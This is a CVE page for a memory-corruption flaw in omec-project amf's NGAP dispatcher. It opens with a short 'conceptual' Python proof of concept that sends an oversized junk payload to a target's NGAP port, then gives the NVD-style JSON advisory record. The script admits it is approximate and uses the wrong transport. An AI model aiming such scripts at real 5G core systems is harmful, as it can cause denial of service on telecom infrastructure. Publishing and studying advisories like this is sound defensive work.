CVE-2026-8780

import socket import struct # Conceptual PoC for CVE-2026-8780 # This script attempts to trigger memory corruption by sending malformed data # to the NGAP dispatcher service. def send_exploit(target_ip, target_port): try: # Establish a connection to the target service # NGAP typically runs over SCTP, but for PoC demonstration we assume TCP or raw socket print(f"[+] Connecting to {target_ip}:{target_port}") s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.settimeout(5) s.connect((target_ip, target_port)) # Construct a malformed payload designed to trigger the dispatcher issue # In a real scenario, this would be a specific NGAP message structure malformed_header = struct.pack('!H', 0x0001) # Fake length malicious_payload = b"\x41" * 1000 + b"\x00" * 50 # Padding to cause overflow/corruption payload = malformed_header + malicious_payload print("[+] Sending malicious payload...") s.send(payload) # Receive response (or lack thereof indicating a crash) response = s.recv(1024) print(f"[+] Received response: {response}") except Exception as e: print(f"[-] Error occurred: {e}") finally: s.close() if __name__ == "__main__": # Replace with actual target IP and Port TARGET_IP = "127.0.0.1" TARGET_PORT = 38412 # Common NGAP port (SCTP), used here for TCP concept send_exploit(TARGET_IP, TARGET_PORT)

{"cve": {"id": "CVE-2026-8780", "sourceIdentifier": "[email protected]", "published": "2026-05-18T02:16:37.383", "lastModified": "2026-05-18T02:16:37.383", "vulnStatus": "Received", "cveTags": [], "descriptions": [{"lang": "en", "value": "A vulnerability was identified in omec-project amf up to 2.1.3-dev. The affected element is an unknown function of the file ngap/dispatcher.go of the component NGAP Message Handler. The manipulation leads to memory corruption. The attack may be initiated remotely. The exploit is publicly available and might be used. Upgrading to version 2.2.0 is sufficient to fix this issue. It is suggested to upgrade the affected component. The same pull request fixes multiple security issues."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 2.1, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.8, "impactScore": 1.4}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:S/C:N/I:N/A:P", "baseScore": 4.0, "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "SINGLE", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "PARTIAL"}, "baseSeverity": "MEDIUM", "exploitabilityScore": 8.0, "impactScore": 2.9, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-119"}]}], "references": [{"url": "https://github.com/omec-project/amf/", "source": "[email protected]"}, {"url": "https://github.com/omec-project/amf/issues/670", "source": "[email protected]"}, {"url": "https://github.com/omec-project/amf/pull/666", "source": "[email protected]"}, {"url": "https://github.com/omec-project/amf/releases/tag/v2.2.0", "source": "[email protected]"}, {"url": "https://vuldb.com/submit/811617", "source": "[email protected]"}, {"url": "https://vuldb.com/vuln/364404", "source": "[email protected]"}, {"url": "https://vuldb.com/vuln/364404/cti", "source": "[email protected]"}]}}